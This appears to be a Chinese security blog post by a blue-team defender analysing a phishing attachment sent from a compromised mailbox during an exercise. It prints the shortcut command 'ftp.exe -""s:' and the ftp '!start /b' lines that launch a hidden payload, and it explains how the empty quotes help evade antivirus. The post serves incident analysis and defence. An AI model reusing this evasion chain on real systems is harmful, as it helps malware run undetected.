freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

一个简单的邮件钓鱼的分析
2024-09-06 22:30:37

前情提要

参与了一次省级的演练,作为蓝队值守,在某天中午,昏昏欲睡之时,客户找来说有员工邮箱账号被拿下群发了钓鱼文件,已发送了400多封邮件,于是进行赶忙进行排查,客户方面很配合也很重视,第一时间将全公司进行断网,终端杀毒软件一台台去杀毒、检测,所幸并无其他状况。

主要处理流程:

1.客户直接断网,防止可能的外连行为与攻击
2.服务器上紧急排查并删除可疑文件,防止服务器收到恶意文件影响被攻击者控制
3.保留一份恶意文件进行分析与溯源
4.排查异常用户邮箱系统的登陆日志,查找对应攻击时间点的IP地址、登陆设备、操作记录
5.获取邮件系统相关服务与配置,对邮件系统可能存在的漏洞进行排查
6.联系账号异常的员工,获取其之前操作的时间与账号相关信息,看是否由弱口令导致的(最终就是因为员工的密码就是一个很经典的弱口令:123456,导致被爆破出来了QAQ)

恶意文件分析:

以钓鱼邮件的形式发送的,疑似用客户公司员工邮件系统使用的弱口令(123456),导致被攻击方爆破出来,并利用该邮箱,对客户公司除信息技术部门的所有员工,进行邮件后门的群发,被其中一名员工电脑上的360安全卫士检测到并拦截,之后通报给了值守方处理。

1.邮件为群发,附件携带一个包含恶意程序的压缩包

1725630337_66db07813011ad09137d8.png!small

SHA256:

d5a2ca1b3a1bff264e292d76f016780f5c3ea1bcbb332a66c8f8aa15a0147f84

MD5:

948dd29aabb4dc9a4fbb92fc322ae82d

SHA1:

a7e5555adae1a9715b0518dee6207109c1870d1c


压缩包内有如下三个文件

1725630367_66db079f4c13a87a8c0bb.png!small

文件结构如下

1725630392_66db07b8800362fb0a47c.png!small

其中Defense含有名为“_”的隐藏文件夹,直接打开是空的

1725630451_66db07f3221ac1be6ede9.png!small

需要在文件资源管理器->查看->隐藏的项目

1725630498_66db0822c5b91350298b3.png!small

勾选后,可以看到隐藏文件,隐藏文件中的内容如下:

1725630503_66db0827c50a880eba1ca.png!small

这就是压缩包中所有文件内容

  1. 先对整个压缩文件在云沙箱中进行检测

1725630511_66db082ff1c6d7f9b1d29.png!small

几个文件主要的修改时间

1725630524_66db083cef5226c0b3875.png!small

执行流程

1725630531_66db0843b7cdf01ae9e5b.png!small

进程详情

1725630540_66db084c0152ae335b3cf.png!small

对其中的setup_13.0.0.2007s.exe程序进行检测

1725630549_66db085545f38765dc01f.png!small

存在疑似恶意行为

1725630557_66db085d377b6ba6c685e.png!small

  1. 对文件进行具体分析

先对隐藏文件夹中内容进行查看

  • 安装说明.txt文件

1725630564_66db08646b05c03892d59.png!small

单纯用来说明安装方法,并进行钓鱼的

  • dll文件

1725630571_66db086b4ac908c6a3b87.png!small

该文件夹下并未有360update.exe,可能因为还未执行setup安装程序

  • ico文件

一个图标文件,可能是用来占位待安装程序执行完后,用360update.exe替换掉,也有可能单纯放错了,或者红队的佬手软了,并未进行其他行为。

回到主文件夹下

1725630584_66db0878a716fd1a3b323.png!small

其中安装说明,是个快捷方式,点击查看其属性与链接

1725630622_66db089ed92ce1a927684.png!small

其目标一栏,内容如下:C:\Windows\System32\ftp.exe -""s:Defense\_\gdcheck.dll,其与常规的快捷方式不同,判断应该是尝试去调用windows下自带的ftp命令,并执行后续的gdcheck.dll文件中的命令:

!start /b Defense\_\360update.exe

!start /b Defense\_\安装说明.txt

bye

查阅相关资料得知,这一行包含了很多小知识,ftp -s :<filename>其中filename为文件名,-s 参数会让ftp去执行文件中记录的命令,也就是上述gdcheck.dll中的命令。

其文件中开头的!号,在ftp中可以结束ftp命令,也就是说相当于结束了ftp而进入了命令行,从而执行后续的一系列命令,之所以这样做而非直接起cmd,推测是为了避免引起杀毒软件的注意,以及掩盖其真实目的。

1725630642_66db08b2b39bb63524092.png!small

对于C:\Windows\System32\ftp.exe -""s:Defense\_\gdcheck.dll这条语句,其就可以相当于ftp -s:Defense\_\gdcheck.dll 其中的””符号是为了避免直接执行相关命令,从而避免被杀毒软件发现,当我们去掉””后,虚拟机中的火绒立刻就识别到了相关行为。

这里也仿照着该钓鱼邮件的方法,创建了一系列文件,并修改快捷方式,同时去掉””符号,在去掉之前,相关命令均正常执行,并未被警告,但是在去掉””后,再次点击对应的快捷方式,虚拟机上的火绒,立即做出反应,提示有非法调用cmd的行为C:\Windows\System32\ftp.exe -s:Desktop\test\_\test.dll

1725630653_66db08bdc7849e147597b.png!small

使用火绒剑对相关进程进行分析,首先点击安装说明,之后在火绒剑中可以看到,相关进程组,先利用ftp命令唤起cmd,之后执行文档中命令,不过由于对应目录中并不存在360update.exe,同时汉字由于windows配置原因,未能正确读取,导致并未执行预期的行为。

1725630664_66db08c83208b7fb007d7.png!small


对于setup.exe那个程序,也进行上线运行,同时在火绒剑上进行观测,火绒仅对安装行为进行了告警,并未认定该程序为恶意程序。

对该安装程序,使用火绒进行查杀,也并未检出有病毒后门等行为,为了进一步确认,从网上下载了最新版的360安全卫士离线安装包, 但由于其在云沙箱有加白,因此只能另外寻找旧版本的离线安装包,并将旧版本安装包也放入云沙箱进行检测。

对于老版本的离线安装包,云沙箱也检测出来类似与邮件马中setup文件相似的行为,同时通过火绒剑比对,邮件马中的setup.exe与官网下载的最新版本离线安装包的差异,发现其行为与http外连情况都很相似,其都是去外连*.s.360.cn,所以判定setup.exe就是一个普通的360离线安装包,并不包含恶意程序,只是一个障眼法(直接和官网对应版本的安装包,计算hash进行比较最为稳妥,但是并未成功找到历史对应版本),eg:当然也有可能是我能力有限眼拙了QAQ,欢迎各位大佬来指正。

将setup.exe在虚拟机中进行安装,进一步观测,期间火绒有提示过appd.dll文件报毒,通过网上搜索资料,怀疑这个文件是360安装包自带的dll文件,并非被修改过,也有可能是用恶意dll进行了替换,可以使用相同的方法,下载安装一个新版的360,将该文件进行提取,并进行比对,查找差异·。当然最直接的方法还是直接对文件进行分析。

1725630694_66db08e6e488b626ded0e.png!small

1725630678_66db08d6802648dbfbf77.png!small

1725631384_66db0b9892f81f45cacec.png!small

查找资料期间,也发现了一个利用的钓鱼分析记录文章,都是利用ftp -“”s <filename>的方式,文件内用ftp !启用cmd,并执行后续的恶意文件调用,那边是调用了python脚本,这里是期望调用360update.exe程序。

# 弱口令 # 钓鱼邮件
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录